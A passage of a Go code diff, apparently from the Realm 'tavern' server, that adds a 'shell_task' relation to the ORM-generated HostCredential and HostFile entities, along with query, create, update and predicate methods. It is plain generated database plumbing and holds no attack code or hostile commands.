Host *Host `json:"host,omitempty"` // Task that reported this credential. Task *Task `json:"task,omitempty"` + // Shell Task that reported this credential. + ShellTask *ShellTask `json:"shell_task,omitempty"` // loadedTypes holds the information for reporting if a // type was loaded (or requested) in eager-loading or not. - loadedTypes [2]bool + loadedTypes [3]bool // totalCount holds the count of the edges above. - totalCount [2]map[string]int + totalCount [3]map[string]int } // HostOrErr returns the Host value or an error if the edge @@ -73,6 +77,17 @@ func (e HostCredentialEdges) TaskOrErr() (*Task, error) { return nil, &NotLoadedError{edge: "task"} } +// ShellTaskOrErr returns the ShellTask value or an error if the edge +// was not loaded in eager-loading, or loaded but was not found. +func (e HostCredentialEdges) ShellTaskOrErr() (*ShellTask, error) { + if e.ShellTask != nil { + return e.ShellTask, nil + } else if e.loadedTypes[2] { + return nil, &NotFoundError{label: shelltask.Label} + } + return nil, &NotLoadedError{edge: "shell_task"} +} + // scanValues returns the types for scanning values from sql.Rows. func (*HostCredential) scanValues(columns []string) ([]any, error) { values := make([]any, len(columns)) @@ -88,7 +103,9 @@ func (*HostCredential) scanValues(columns []string) ([]any, error) { values[i] = new(sql.NullTime) case hostcredential.ForeignKeys[0]: // host_credential_host values[i] = new(sql.NullInt64) - case hostcredential.ForeignKeys[1]: // task_reported_credentials + case hostcredential.ForeignKeys[1]: // shell_task_reported_credentials + values[i] = new(sql.NullInt64) + case hostcredential.ForeignKeys[2]: // task_reported_credentials values[i] = new(sql.NullInt64) default: values[i] = new(sql.UnknownType) @@ -149,6 +166,13 @@ func (hc *HostCredential) assignValues(columns []string, values []any) error { *hc.host_credential_host = int(value.Int64) } case hostcredential.ForeignKeys[1]: + if value, ok := values[i].(*sql.NullInt64); !ok { + return fmt.Errorf("unexpected type %T for edge-field shell_task_reported_credentials", value) + } else if value.Valid { + hc.shell_task_reported_credentials = new(int) + *hc.shell_task_reported_credentials = int(value.Int64) + } + case hostcredential.ForeignKeys[2]: if value, ok := values[i].(*sql.NullInt64); !ok { return fmt.Errorf("unexpected type %T for edge-field task_reported_credentials", value) } else if value.Valid { @@ -178,6 +202,11 @@ func (hc *HostCredential) QueryTask() *TaskQuery { return NewHostCredentialClient(hc.config).QueryTask(hc) } +// QueryShellTask queries the "shell_task" edge of the HostCredential entity. +func (hc *HostCredential) QueryShellTask() *ShellTaskQuery { + return NewHostCredentialClient(hc.config).QueryShellTask(hc) +} + // Update returns a builder for updating this HostCredential. // Note that you need to call HostCredential.Unwrap() before calling this method if this HostCredential // was returned from a transaction, and the transaction was committed or rolled back. diff --git a/tavern/internal/ent/hostcredential/hostcredential.go b/tavern/internal/ent/hostcredential/hostcredential.go index 1e32ea31a..5c1bafa5f 100644 --- a/tavern/internal/ent/hostcredential/hostcredential.go +++ b/tavern/internal/ent/hostcredential/hostcredential.go @@ -31,6 +31,8 @@ const ( EdgeHost = "host" // EdgeTask holds the string denoting the task edge name in mutations. EdgeTask = "task" + // EdgeShellTask holds the string denoting the shell_task edge name in mutations. + EdgeShellTask = "shell_task" // Table holds the table name of the hostcredential in the database. Table = "host_credentials" // HostTable is the table that holds the host relation/edge. @@ -47,6 +49,13 @@ const ( TaskInverseTable = "tasks" // TaskColumn is the table column denoting the task relation/edge. TaskColumn = "task_reported_credentials" + // ShellTaskTable is the table that holds the shell_task relation/edge. + ShellTaskTable = "host_credentials" + // ShellTaskInverseTable is the table name for the ShellTask entity. + // It exists in this package in order to avoid circular dependency with the "shelltask" package. + ShellTaskInverseTable = "shell_tasks" + // ShellTaskColumn is the table column denoting the shell_task relation/edge. + ShellTaskColumn = "shell_task_reported_credentials" ) // Columns holds all SQL columns for hostcredential fields. @@ -63,6 +72,7 @@ var Columns = []string{ // table and are not defined as standalone fields in the schema. var ForeignKeys = []string{ "host_credential_host", + "shell_task_reported_credentials", "task_reported_credentials", } @@ -150,6 +160,13 @@ func ByTaskField(field string, opts ...sql.OrderTermOption) OrderOption { sqlgraph.OrderByNeighborTerms(s, newTaskStep(), sql.OrderByField(field, opts...)) } } + +// ByShellTaskField orders the results by shell_task field. +func ByShellTaskField(field string, opts ...sql.OrderTermOption) OrderOption { + return func(s *sql.Selector) { + sqlgraph.OrderByNeighborTerms(s, newShellTaskStep(), sql.OrderByField(field, opts...)) + } +} func newHostStep() *sqlgraph.Step { return sqlgraph.NewStep( sqlgraph.From(Table, FieldID), @@ -164,6 +181,13 @@ func newTaskStep() *sqlgraph.Step { sqlgraph.Edge(sqlgraph.M2O, true, TaskTable, TaskColumn), ) } +func newShellTaskStep() *sqlgraph.Step { + return sqlgraph.NewStep( + sqlgraph.From(Table, FieldID), + sqlgraph.To(ShellTaskInverseTable, FieldID), + sqlgraph.Edge(sqlgraph.M2O, true, ShellTaskTable, ShellTaskColumn), + ) +} var ( // epb.Credential_Kind must implement graphql.Marshaler. diff --git a/tavern/internal/ent/hostcredential/where.go b/tavern/internal/ent/hostcredential/where.go index 36dd25999..4ade2e8e7 100644 --- a/tavern/internal/ent/hostcredential/where.go +++ b/tavern/internal/ent/hostcredential/where.go @@ -352,6 +352,29 @@ func HasTaskWith(preds ...predicate.Task) predicate.HostCredential { }) } +// HasShellTask applies the HasEdge predicate on the "shell_task" edge. +func HasShellTask() predicate.HostCredential { + return predicate.HostCredential(func(s *sql.Selector) { + step := sqlgraph.NewStep( + sqlgraph.From(Table, FieldID), + sqlgraph.Edge(sqlgraph.M2O, true, ShellTaskTable, ShellTaskColumn), + ) + sqlgraph.HasNeighbors(s, step) + }) +} + +// HasShellTaskWith applies the HasEdge predicate on the "shell_task" edge with a given conditions (other predicates). +func HasShellTaskWith(preds ...predicate.ShellTask) predicate.HostCredential { + return predicate.HostCredential(func(s *sql.Selector) { + step := newShellTaskStep() + sqlgraph.HasNeighborsWith(s, step, func(s *sql.Selector) { + for _, p := range preds { + p(s) + } + }) + }) +} + // And groups predicates with the AND operator between them. func And(predicates ...predicate.HostCredential) predicate.HostCredential { return predicate.HostCredential(sql.AndPredicates(predicates...)) diff --git a/tavern/internal/ent/hostcredential_create.go b/tavern/internal/ent/hostcredential_create.go index 20efc1c3d..2d5164d31 100644 --- a/tavern/internal/ent/hostcredential_create.go +++ b/tavern/internal/ent/hostcredential_create.go @@ -14,6 +14,7 @@ import ( "realm.pub/tavern/internal/c2/epb" "realm.pub/tavern/internal/ent/host" "realm.pub/tavern/internal/ent/hostcredential" + "realm.pub/tavern/internal/ent/shelltask" "realm.pub/tavern/internal/ent/task" ) @@ -101,6 +102,25 @@ func (hcc *HostCredentialCreate) SetTask(t *Task) *HostCredentialCreate { return hcc.SetTaskID(t.ID) } +// SetShellTaskID sets the "shell_task" edge to the ShellTask entity by ID. +func (hcc *HostCredentialCreate) SetShellTaskID(id int) *HostCredentialCreate { + hcc.mutation.SetShellTaskID(id) + return hcc +} + +// SetNillableShellTaskID sets the "shell_task" edge to the ShellTask entity by ID if the given value is not nil. +func (hcc *HostCredentialCreate) SetNillableShellTaskID(id *int) *HostCredentialCreate { + if id != nil { + hcc = hcc.SetShellTaskID(*id) + } + return hcc +} + +// SetShellTask sets the "shell_task" edge to the ShellTask entity. +func (hcc *HostCredentialCreate) SetShellTask(s *ShellTask) *HostCredentialCreate { + return hcc.SetShellTaskID(s.ID) +} + // Mutation returns the HostCredentialMutation object of the builder. func (hcc *HostCredentialCreate) Mutation() *HostCredentialMutation { return hcc.mutation @@ -262,6 +282,23 @@ func (hcc *HostCredentialCreate) createSpec() (*HostCredential, *sqlgraph.Create _node.task_reported_credentials = &nodes[0] _spec.Edges = append(_spec.Edges, edge) } + if nodes := hcc.mutation.ShellTaskIDs(); len(nodes) > 0 { + edge := &sqlgraph.EdgeSpec{ + Rel: sqlgraph.M2O, + Inverse: true, + Table: hostcredential.ShellTaskTable, + Columns: []string{hostcredential.ShellTaskColumn}, + Bidi: false, + Target: &sqlgraph.EdgeTarget{ + IDSpec: sqlgraph.NewFieldSpec(shelltask.FieldID, field.TypeInt), + }, + } + for _, k := range nodes { + edge.Target.Nodes = append(edge.Target.Nodes, k) + } + _node.shell_task_reported_credentials = &nodes[0] + _spec.Edges = append(_spec.Edges, edge) + } return _node, _spec } diff --git a/tavern/internal/ent/hostcredential_query.go b/tavern/internal/ent/hostcredential_query.go index fe08d05af..6d6c0c86b 100644 --- a/tavern/internal/ent/hostcredential_query.go +++ b/tavern/internal/ent/hostcredential_query.go @@ -14,21 +14,23 @@ import ( "realm.pub/tavern/internal/ent/host" "realm.pub/tavern/internal/ent/hostcredential" "realm.pub/tavern/internal/ent/predicate" + "realm.pub/tavern/internal/ent/shelltask" "realm.pub/tavern/internal/ent/task" ) // HostCredentialQuery is the builder for querying HostCredential entities. type HostCredentialQuery struct { config - ctx *QueryContext - order []hostcredential.OrderOption - inters []Interceptor - predicates []predicate.HostCredential - withHost *HostQuery - withTask *TaskQuery - withFKs bool - modifiers []func(*sql.Selector) - loadTotal []func(context.Context, []*HostCredential) error + ctx *QueryContext + order []hostcredential.OrderOption + inters []Interceptor + predicates []predicate.HostCredential + withHost *HostQuery + withTask *TaskQuery + withShellTask *ShellTaskQuery + withFKs bool + modifiers []func(*sql.Selector) + loadTotal []func(context.Context, []*HostCredential) error // intermediate query (i.e. traversal path). sql *sql.Selector path func(context.Context) (*sql.Selector, error) @@ -109,6 +111,28 @@ func (hcq *HostCredentialQuery) QueryTask() *TaskQuery { return query } +// QueryShellTask chains the current query on the "shell_task" edge. +func (hcq *HostCredentialQuery) QueryShellTask() *ShellTaskQuery { + query := (&ShellTaskClient{config: hcq.config}).Query() + query.path = func(ctx context.Context) (fromU *sql.Selector, err error) { + if err := hcq.prepareQuery(ctx); err != nil { + return nil, err + } + selector := hcq.sqlQuery(ctx) + if err := selector.Err(); err != nil { + return nil, err + } + step := sqlgraph.NewStep( + sqlgraph.From(hostcredential.Table, hostcredential.FieldID, selector), + sqlgraph.To(shelltask.Table, shelltask.FieldID), + sqlgraph.Edge(sqlgraph.M2O, true, hostcredential.ShellTaskTable, hostcredential.ShellTaskColumn), + ) + fromU = sqlgraph.SetNeighbors(hcq.driver.Dialect(), step) + return fromU, nil + } + return query +} + // First returns the first HostCredential entity from the query. // Returns a *NotFoundError when no HostCredential was found. func (hcq *HostCredentialQuery) First(ctx context.Context) (*HostCredential, error) { @@ -296,13 +320,14 @@ func (hcq *HostCredentialQuery) Clone() *HostCredentialQuery { return nil } return &HostCredentialQuery{ - config: hcq.config, - ctx: hcq.ctx.Clone(), - order: append([]hostcredential.OrderOption{}, hcq.order...), - inters: append([]Interceptor{}, hcq.inters...), - predicates: append([]predicate.HostCredential{}, hcq.predicates...), - withHost: hcq.withHost.Clone(), - withTask: hcq.withTask.Clone(), + config: hcq.config, + ctx: hcq.ctx.Clone(), + order: append([]hostcredential.OrderOption{}, hcq.order...), + inters: append([]Interceptor{}, hcq.inters...), + predicates: append([]predicate.HostCredential{}, hcq.predicates...), + withHost: hcq.withHost.Clone(), + withTask: hcq.withTask.Clone(), + withShellTask: hcq.withShellTask.Clone(), // clone intermediate query. sql: hcq.sql.Clone(), path: hcq.path, @@ -331,6 +356,17 @@ func (hcq *HostCredentialQuery) WithTask(opts ...func(*TaskQuery)) *HostCredenti return hcq } +// WithShellTask tells the query-builder to eager-load the nodes that are connected to +// the "shell_task" edge. The optional arguments are used to configure the query builder of the edge. +func (hcq *HostCredentialQuery) WithShellTask(opts ...func(*ShellTaskQuery)) *HostCredentialQuery { + query := (&ShellTaskClient{config: hcq.config}).Query() + for _, opt := range opts { + opt(query) + } + hcq.withShellTask = query + return hcq +} + // GroupBy is used to group vertices by one or more fields/columns. // It is often used with aggregate functions, like: count, max, mean, min, sum. // @@ -410,12 +446,13 @@ func (hcq *HostCredentialQuery) sqlAll(ctx context.Context, hooks ...queryHook) nodes = []*HostCredential{} withFKs = hcq.withFKs _spec = hcq.querySpec() - loadedTypes = [2]bool{ + loadedTypes = [3]bool{ hcq.withHost != nil, hcq.withTask != nil, + hcq.withShellTask != nil, } ) - if hcq.withHost != nil || hcq.withTask != nil { + if hcq.withHost != nil || hcq.withTask != nil || hcq.withShellTask != nil { withFKs = true } if withFKs { @@ -454,6 +491,12 @@ func (hcq *HostCredentialQuery) sqlAll(ctx context.Context, hooks ...queryHook) return nil, err } } + if query := hcq.withShellTask; query != nil { + if err := hcq.loadShellTask(ctx, query, nodes, nil, + func(n *HostCredential, e *ShellTask) { n.Edges.ShellTask = e }); err != nil { + return nil, err + } + } for i := range hcq.loadTotal { if err := hcq.loadTotal[i](ctx, nodes); err != nil { return nil, err @@ -526,6 +569,38 @@ func (hcq *HostCredentialQuery) loadTask(ctx context.Context, query *TaskQuery, } return nil } +func (hcq *HostCredentialQuery) loadShellTask(ctx context.Context, query *ShellTaskQuery, nodes []*HostCredential, init func(*HostCredential), assign func(*HostCredential, *ShellTask)) error { + ids := make([]int, 0, len(nodes)) + nodeids := make(map[int][]*HostCredential) + for i := range nodes { + if nodes[i].shell_task_reported_credentials == nil { + continue + } + fk := *nodes[i].shell_task_reported_credentials + if _, ok := nodeids[fk]; !ok { + ids = append(ids, fk) + } + nodeids[fk] = append(nodeids[fk], nodes[i]) + } + if len(ids) == 0 { + return nil + } + query.Where(shelltask.IDIn(ids...)) + neighbors, err := query.All(ctx) + if err != nil { + return err + } + for _, n := range neighbors { + nodes, ok := nodeids[n.ID] + if !ok { + return fmt.Errorf(`unexpected foreign-key "shell_task_reported_credentials" returned %v`, n.ID) + } + for i := range nodes { + assign(nodes[i], n) + } + } + return nil +} func (hcq *HostCredentialQuery) sqlCount(ctx context.Context) (int, error) { _spec := hcq.querySpec() diff --git a/tavern/internal/ent/hostcredential_update.go b/tavern/internal/ent/hostcredential_update.go index 860eb9dcb..ef6bd7fe2 100644 --- a/tavern/internal/ent/hostcredential_update.go +++ b/tavern/internal/ent/hostcredential_update.go @@ -15,6 +15,7 @@ import ( "realm.pub/tavern/internal/ent/host" "realm.pub/tavern/internal/ent/hostcredential" "realm.pub/tavern/internal/ent/predicate" + "realm.pub/tavern/internal/ent/shelltask" "realm.pub/tavern/internal/ent/task" ) @@ -109,6 +110,25 @@ func (hcu *HostCredentialUpdate) SetTask(t *Task) *HostCredentialUpdate { return hcu.SetTaskID(t.ID) } +// SetShellTaskID sets the "shell_task" edge to the ShellTask entity by ID. +func (hcu *HostCredentialUpdate) SetShellTaskID(id int) *HostCredentialUpdate { + hcu.mutation.SetShellTaskID(id) + return hcu +} + +// SetNillableShellTaskID sets the "shell_task" edge to the ShellTask entity by ID if the given value is not nil. +func (hcu *HostCredentialUpdate) SetNillableShellTaskID(id *int) *HostCredentialUpdate { + if id != nil { + hcu = hcu.SetShellTaskID(*id) + } + return hcu +} + +// SetShellTask sets the "shell_task" edge to the ShellTask entity. +func (hcu *HostCredentialUpdate) SetShellTask(s *ShellTask) *HostCredentialUpdate { + return hcu.SetShellTaskID(s.ID) +} + // Mutation returns the HostCredentialMutation object of the builder. func (hcu *HostCredentialUpdate) Mutation() *HostCredentialMutation { return hcu.mutation @@ -126,6 +146,12 @@ func (hcu *HostCredentialUpdate) ClearTask() *HostCredentialUpdate { return hcu } +// ClearShellTask clears the "shell_task" edge to the ShellTask entity. +func (hcu *HostCredentialUpdate) ClearShellTask() *HostCredentialUpdate { + hcu.mutation.ClearShellTask() + return hcu +} + // Save executes the query and returns the number of nodes affected by the update operation. func (hcu *HostCredentialUpdate) Save(ctx context.Context) (int, error) { hcu.defaults() @@ -267,6 +293,35 @@ func (hcu *HostCredentialUpdate) sqlSave(ctx context.Context) (n int, err error) } _spec.Edges.Add = append(_spec.Edges.Add, edge) } + if hcu.mutation.ShellTaskCleared() { + edge := &sqlgraph.EdgeSpec{ + Rel: sqlgraph.M2O, + Inverse: true, + Table: hostcredential.ShellTaskTable, + Columns: []string{hostcredential.ShellTaskColumn}, + Bidi: false, + Target: &sqlgraph.EdgeTarget{ + IDSpec: sqlgraph.NewFieldSpec(shelltask.FieldID, field.TypeInt), + }, + } + _spec.Edges.Clear = append(_spec.Edges.Clear, edge) + } + if nodes := hcu.mutation.ShellTaskIDs(); len(nodes) > 0 { + edge := &sqlgraph.EdgeSpec{ + Rel: sqlgraph.M2O, + Inverse: true, + Table: hostcredential.ShellTaskTable, + Columns: []string{hostcredential.ShellTaskColumn}, + Bidi: false, + Target: &sqlgraph.EdgeTarget{ + IDSpec: sqlgraph.NewFieldSpec(shelltask.FieldID, field.TypeInt), + }, + } + for _, k := range nodes { + edge.Target.Nodes = append(edge.Target.Nodes, k) + } + _spec.Edges.Add = append(_spec.Edges.Add, edge) + } if n, err = sqlgraph.UpdateNodes(ctx, hcu.driver, _spec); err != nil { if _, ok := err.(*sqlgraph.NotFoundError); ok { err = &NotFoundError{hostcredential.Label} @@ -365,6 +420,25 @@ func (hcuo *HostCredentialUpdateOne) SetTask(t *Task) *HostCredentialUpdateOne { return hcuo.SetTaskID(t.ID) } +// SetShellTaskID sets the "shell_task" edge to the ShellTask entity by ID. +func (hcuo *HostCredentialUpdateOne) SetShellTaskID(id int) *HostCredentialUpdateOne { + hcuo.mutation.SetShellTaskID(id) + return hcuo +} + +// SetNillableShellTaskID sets the "shell_task" edge to the ShellTask entity by ID if the given value is not nil. +func (hcuo *HostCredentialUpdateOne) SetNillableShellTaskID(id *int) *HostCredentialUpdateOne { + if id != nil { + hcuo = hcuo.SetShellTaskID(*id) + } + return hcuo +} + +// SetShellTask sets the "shell_task" edge to the ShellTask entity. +func (hcuo *HostCredentialUpdateOne) SetShellTask(s *ShellTask) *HostCredentialUpdateOne { + return hcuo.SetShellTaskID(s.ID) +} + // Mutation returns the HostCredentialMutation object of the builder. func (hcuo *HostCredentialUpdateOne) Mutation() *HostCredentialMutation { return hcuo.mutation @@ -382,6 +456,12 @@ func (hcuo *HostCredentialUpdateOne) ClearTask() *HostCredentialUpdateOne { return hcuo } +// ClearShellTask clears the "shell_task" edge to the ShellTask entity. +func (hcuo *HostCredentialUpdateOne) ClearShellTask() *HostCredentialUpdateOne { + hcuo.mutation.ClearShellTask() + return hcuo +} + // Where appends a list predicates to the HostCredentialUpdate builder. func (hcuo *HostCredentialUpdateOne) Where(ps ...predicate.HostCredential) *HostCredentialUpdateOne { hcuo.mutation.Where(ps...) @@ -553,6 +633,35 @@ func (hcuo *HostCredentialUpdateOne) sqlSave(ctx context.Context) (_node *HostCr } _spec.Edges.Add = append(_spec.Edges.Add, edge) } + if hcuo.mutation.ShellTaskCleared() { + edge := &sqlgraph.EdgeSpec{ + Rel: sqlgraph.M2O, + Inverse: true, + Table: hostcredential.ShellTaskTable, + Columns: []string{hostcredential.ShellTaskColumn}, + Bidi: false, + Target: &sqlgraph.EdgeTarget{ + IDSpec: sqlgraph.NewFieldSpec(shelltask.FieldID, field.TypeInt), + }, + } + _spec.Edges.Clear = append(_spec.Edges.Clear, edge) + } + if nodes := hcuo.mutation.ShellTaskIDs(); len(nodes) > 0 { + edge := &sqlgraph.EdgeSpec{ + Rel: sqlgraph.M2O, + Inverse: true, + Table: hostcredential.ShellTaskTable, + Columns: []string{hostcredential.ShellTaskColumn}, + Bidi: false, + Target: &sqlgraph.EdgeTarget{ + IDSpec: sqlgraph.NewFieldSpec(shelltask.FieldID, field.TypeInt), + }, + } + for _, k := range nodes { + edge.Target.Nodes = append(edge.Target.Nodes, k) + } + _spec.Edges.Add = append(_spec.Edges.Add, edge) + } _node = &HostCredential{config: hcuo.config} _spec.Assign = _node.assignValues _spec.ScanValues = _node.scanValues diff --git a/tavern/internal/ent/hostfile.go b/tavern/internal/ent/hostfile.go index 5b3a1f3bb..f69df7c95 100644 --- a/tavern/internal/ent/hostfile.go +++ b/tavern/internal/ent/hostfile.go @@ -11,6 +11,7 @@ import ( "entgo.io/ent/dialect/sql" "realm.pub/tavern/internal/ent/host" "realm.pub/tavern/internal/ent/hostfile" + "realm.pub/tavern/internal/ent/shelltask" "realm.pub/tavern/internal/ent/task" ) @@ -39,11 +40,12 @@ type HostFile struct { Content []byte `json:"content,omitempty"` // Edges holds the relations/edges for other nodes in the graph. // The values are being populated by the HostFileQuery when eager-loading is set. - Edges HostFileEdges `json:"edges"` - host_files *int - host_file_host *int - task_reported_files *int - selectValues sql.SelectValues + Edges HostFileEdges `json:"edges"` + host_files *int + host_file_host *int + shell_task_reported_files *int + task_reported_files *int + selectValues sql.SelectValues } // HostFileEdges holds the relations/edges for other nodes in the graph. @@ -52,11 +54,13 @@ type HostFileEdges struct { Host *Host `json:"host,omitempty"` // Task that reported this file. Task *Task `json:"task,omitempty"` + // Shell Task that reported this file. + ShellTask *ShellTask `json:"shell_task,omitempty"` // loadedTypes holds the information for reporting if a // type was loaded (or requested) in eager-loading or not. - loadedTypes [2]bool + loadedTypes [3]bool // totalCount holds the count of the edges above. - totalCount [2]map[string]int + totalCount [3]map[string]int } // HostOrErr returns the Host value or an error if the edge @@ -81,6 +85,17 @@ func (e HostFileEdges) TaskOrErr() (*Task, error) { return nil, &NotLoadedError{edge: "task"} } +// ShellTaskOrErr returns the ShellTask value or an error if the edge +// was not loaded in eager-loading, or loaded but was not found. +func (e HostFileEdges) ShellTaskOrErr() (*ShellTask, error) { + if e.ShellTask != nil { + return e.ShellTask, nil + } else if e.loadedTypes[2] { + return nil, &NotFoundError{label: shelltask.Label} + } + return nil, &NotLoadedError{edge: "shell_task"} +} + // scanValues returns the types for scanning values from sql.Rows. func (*HostFile) scanValues(columns []string) ([]any, error) { values := make([]any, len(columns)) @@ -98,7 +113,9 @@ func (*HostFile) scanValues(columns []string) ([]any, error) { values[i] = new(sql.NullInt64) case hostfile.ForeignKeys[1]: // host_file_host values[i] = new(sql.NullInt64) - case hostfile.ForeignKeys[2]: // task_reported_files + case hostfile.ForeignKeys[2]: // shell_task_reported_files + values[i] = new(sql.NullInt64) + case hostfile.ForeignKeys[3]: // task_reported_files values[i] = new(sql.NullInt64) default: values[i] = new(sql.UnknownType) @@ -190,6 +207,13 @@ func (hf *HostFile) assignValues(columns []string, values []any) error { *hf.host_file_host = int(value.Int64) } case hostfile.ForeignKeys[2]: + if value, ok := values[i].(*sql.NullInt64); !ok { + return fmt.Errorf("unexpected type %T for edge-field shell_task_reported_files", value) + } else if value.Valid { + hf.shell_task_reported_files = new(int) + *hf.shell_task_reported_files = int(value.Int64) + } + case hostfile.ForeignKeys[3]: if value, ok := values[i].(*sql.NullInt64); !ok { return fmt.Errorf("unexpected type %T for edge-field task_reported_files", value) } else if value.Valid { @@ -219,6 +243,11 @@ func (hf *HostFile) QueryTask() *TaskQuery { return NewHostFileClient(hf.config).QueryTask(hf) } +// QueryShellTask queries the "shell_task" edge of the HostFile entity. +func (hf *HostFile) QueryShellTask() *ShellTaskQuery { + return NewHostFileClient(hf.config).QueryShellTask(hf) +} + // Update returns a builder for updating this HostFile. // Note that you need to call HostFile.Unwrap() before calling this method if this HostFile // was returned from a transaction, and the transaction was committed or rolled back. diff --git a/tavern/internal/ent/hostfile/hostfile.go b/tavern/internal/ent/hostfile/hostfile.go index feb51d3ec..66e92a249 100644 --- a/tavern/internal/ent/hostfile/hostfile.go +++ b/tavern/internal/ent/hostfile/hostfile.go @@ -37,6 +37,8 @@ const ( EdgeHost = "host" // EdgeTask holds the string denoting the task edge name in mutations. EdgeTask = "task" + // EdgeShellTask holds the string denoting the shell_task edge name in mutations. + EdgeShellTask = "shell_task" // Table holds the table name of the hostfile in the database. Table = "host_files" // HostTable is the table that holds the host relation/edge. @@ -53,6 +55,13 @@ const ( TaskInverseTable = "tasks" // TaskColumn is the table column denoting the task relation/edge. TaskColumn = "task_reported_files" + // ShellTaskTable is the table that holds the shell_task relation/edge. + ShellTaskTable = "host_files" + // ShellTaskInverseTable is the table name for the ShellTask entity. + // It exists in this package in order to avoid circular dependency with the "shelltask" package. + ShellTaskInverseTable = "shell_tasks" + // ShellTaskColumn is the table column denoting the shell_task relation/edge. + ShellTaskColumn = "shell_task_reported_files" ) // Columns holds all SQL columns for hostfile fields. @@ -74,6 +83,7 @@ var Columns = []string{ var ForeignKeys = []string{ "host_files", "host_file_host", + "shell_task_reported_files", "task_reported_files", } @@ -176,6 +186,13 @@ func ByTaskField(field string, opts ...sql.OrderTermOption) OrderOption { sqlgraph.OrderByNeighborTerms(s, newTaskStep(), sql.OrderByField(field, opts...)) } } + +// ByShellTaskField orders the results by shell_task field. +func ByShellTaskField(field string, opts ...sql.OrderTermOption) OrderOption { + return func(s *sql.Selector) { + sqlgraph.OrderByNeighborTerms(s, newShellTaskStep(), sql.OrderByField(field, opts...)) + } +} func newHostStep() *sqlgraph.Step { return sqlgraph.NewStep( sqlgraph.From(Table, FieldID), @@ -190,3 +207,10 @@ func newTaskStep() *sqlgraph.Step { sqlgraph.Edge(sqlgraph.M2O, true, TaskTable, TaskColumn), ) } +func newShellTaskStep() *sqlgraph.Step { + return sqlgraph.NewStep( + sqlgraph.From(Table, FieldID), + sqlgraph.To(ShellTaskInverseTable, FieldID), + sqlgraph.Edge(sqlgraph.M2O, true, ShellTaskTable, ShellTaskColumn), + ) +} diff --git a/tavern/internal/ent/hostfile/where.go b/tavern/internal/ent/hostfile/where.go index 4b1f17cf5..01fbe97df 100644 --- a/tavern/internal/ent/hostfile/where.go +++ b/tavern/internal/ent/hostfile/where.go @@ -681,6 +681,29 @@ func HasTaskWith(preds ...predicate.Task) predicate.HostFile { }) } +// HasShellTask applies the HasEdge predicate on the "shell_task" edge. +func HasShellTask() predicate.HostFile { + return predicate.HostFile(func(s *sql.Selector) { + step := sqlgraph.NewStep( + sqlgraph.From(Table, FieldID), + sqlgraph.Edge(sqlgraph.M2O, true, ShellTaskTable, ShellTaskColumn), + ) + sqlgraph.HasNeighbors(s, step) + }) +} + +// HasShellTaskWith applies the HasEdge predicate on the "shell_task" edge with a given conditions (other predicates). +func HasShellTaskWith(preds ...predicate.ShellTask) predicate.HostFile { + return predicate.HostFile(func(s *sql.Selector) { + step := newShellTaskStep() + sqlgraph.HasNeighborsWith(s, step, func(s *sql.Selector) { + for _, p := range preds { + p(s) + } + }) + }) +} + // And groups predicates with the AND operator between them. func And(predicates ...predicate.HostFile) predicate.HostFile { return predicate.HostFile(sql.AndPredicates(predicates...)) diff --git a/tavern/internal/ent/hostfile_create.go b/tavern/internal/ent/hostfile_create.go index ef817b755..6b0973571 100644 --- a/tavern/internal/ent/hostfile_create.go +++ b/tavern/internal/ent/hostfile_create.go @@ -13,6 +13,7 @@ import ( "entgo.io/ent/schema/field" "realm.pub/tavern/internal/ent/host" "realm.pub/tavern/internal/ent/hostfile" + "realm.pub/tavern/internal/ent/shelltask" "realm.pub/tavern/internal/ent/task" ) @@ -151,11 +152,38 @@ func (hfc *HostFileCreate) SetTaskID(id int) *HostFileCreate { return hfc } +// SetNillableTaskID sets the "task" edge to the Task entity by ID if the given value is not nil. +func (hfc *HostFileCreate) SetNillableTaskID(id *int) *HostFileCreate { + if id != nil { + hfc = hfc.SetTaskID(*id) + } + return hfc +} + // SetTask sets the "task" edge to the Task entity. func (hfc *HostFileCreate) SetTask(t *Task) *HostFileCreate { return hfc.SetTaskID(t.ID) } +// SetShellTaskID sets the "shell_task" edge to the ShellTask entity by ID. +func (hfc *HostFileCreate) SetShellTaskID(id int) *HostFileCreate { + hfc.mutation.SetShellTaskID(id) + return hfc +} + +// SetNillableShellTaskID sets the "shell_task" edge to the ShellTask entity by ID if the given value is not nil. +func (hfc *HostFileCreate) SetNillableShellTaskID(id *int) *HostFileCreate { + if id != nil { + hfc = hfc.SetShellTaskID(*id) + } + return hfc +} + +// SetShellTask sets the "shell_task" edge to the ShellTask entity. +func (hfc *HostFileCreate) SetShellTask(s *ShellTask) *HostFileCreate { + return hfc.SetShellTaskID(s.ID) +} + // Mutation returns the HostFileMutation object of the builder. func (hfc *HostFileCreate) Mutation() *HostFileMutation { return hfc.mutation @@ -246,9 +274,6 @@ func (hfc *HostFileCreate) check() error { if len(hfc.mutation.HostIDs()) == 0 { return &ValidationError{Name: "host", err: errors.New(`ent: missing required edge "HostFile.host"`)} } - if len(hfc.mutation.TaskIDs()) == 0 { - return &ValidationError{Name: "task", err: errors.New(`ent: missing required edge "HostFile.task"`)} - } return nil } @@ -346,6 +371,23 @@ func (hfc *HostFileCreate) createSpec() (*HostFile, *sqlgraph.CreateSpec) { _node.task_reported_files = &nodes[0] _spec.Edges = append(_spec.Edges, edge) } + if nodes := hfc.mutation.ShellTaskIDs(); len(nodes) > 0 { + edge := &sqlgraph.EdgeSpec{ + Rel: sqlgraph.M2O, + Inverse: true, + Table: hostfile.ShellTaskTable, + Columns: []string{hostfile.ShellTaskColumn}, + Bidi: false, + Target: &sqlgraph.EdgeTarget{ + IDSpec: sqlgraph.NewFieldSpec(shelltask.FieldID, field.TypeInt), + }, + } + for _, k := range nodes { + edge.Target.Nodes = append(edge.Target.Nodes, k) + } + _node.shell_task_reported_files = &nodes[0] + _spec.Edges = append(_spec.Edges, edge) + } return _node, _spec } diff --git a/tavern/internal/ent/hostfile_query.go b/tavern/internal/ent/hostfile_query.go index 720e3ad2f..8229baf92 100644 --- a/tavern/internal/ent/hostfile_query.go +++ b/tavern/internal/ent/hostfile_query.go @@ -14,21 +14,23 @@ import ( "realm.pub/tavern/internal/ent/host" "realm.pub/tavern/internal/ent/hostfile" "realm.pub/tavern/internal/ent/predicate" + "realm.pub/tavern/internal/ent/shelltask" "realm.pub/tavern/internal/ent/task" ) // HostFileQuery is the builder for querying HostFile entities. type HostFileQuery struct { config - ctx *QueryContext - order []hostfile.OrderOption - inters []Interceptor - predicates []predicate.HostFile - withHost *HostQuery - withTask *TaskQuery - withFKs bool - modifiers []func(*sql.Selector) - loadTotal []func(context.Context, []*HostFile) error + ctx *QueryContext + order []hostfile.OrderOption + inters []Interceptor + predicates []predicate.HostFile + withHost *HostQuery 